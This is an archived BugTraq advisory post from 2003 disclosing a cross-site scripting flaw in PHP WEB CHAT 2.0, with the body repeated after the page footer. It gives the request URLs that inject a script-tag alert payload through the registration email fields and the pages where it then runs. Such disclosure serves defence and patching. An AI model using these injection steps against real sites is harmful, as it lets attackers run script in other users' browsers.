BugTraq
Back to list
|
Post reply
CSS in PHP WEB CHAT
Mar 25 2003 09:11AM
Over_G (overg mail ru)
Product: PHP WEB CHAT
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------
Actions:
1)Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=
<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr
*pt>
2)To return the lost password and CSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG
3)View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG
Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
ogprog (at) ukr (dot) net [email concealed]
Best regards, Over G[DWC Gr0up]
P.S. Sorry for my English :)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Version: 2.0
OffSite: http://www.webscriptworld.com
Problem: Cross Site Scripting
--------------------------------------------
Actions:
1)Register
http://[victim]/chat_dir/register.php?register=yes&username=OverG&email=
<scr*pt>alert%20("Test!")</scr*pt>&email1=<scr*pt>alert%20("Test!")</scr
*pt>
2)To return the lost password and CSS is carried out (email)
http://[victim]/chat_dir/login.php?option=lostpasswd&username=OverG
3)View profile (email1)
http://[victim]/chat_dir/profile.php?username=OverG
Contacts: www.overg.com www.dwcgr0up.com
irc.zaingandol.org #DWC
ogprog (at) ukr (dot) net [email concealed]
Best regards, Over G[DWC Gr0up]
P.S. Sorry for my English :)
[ reply ]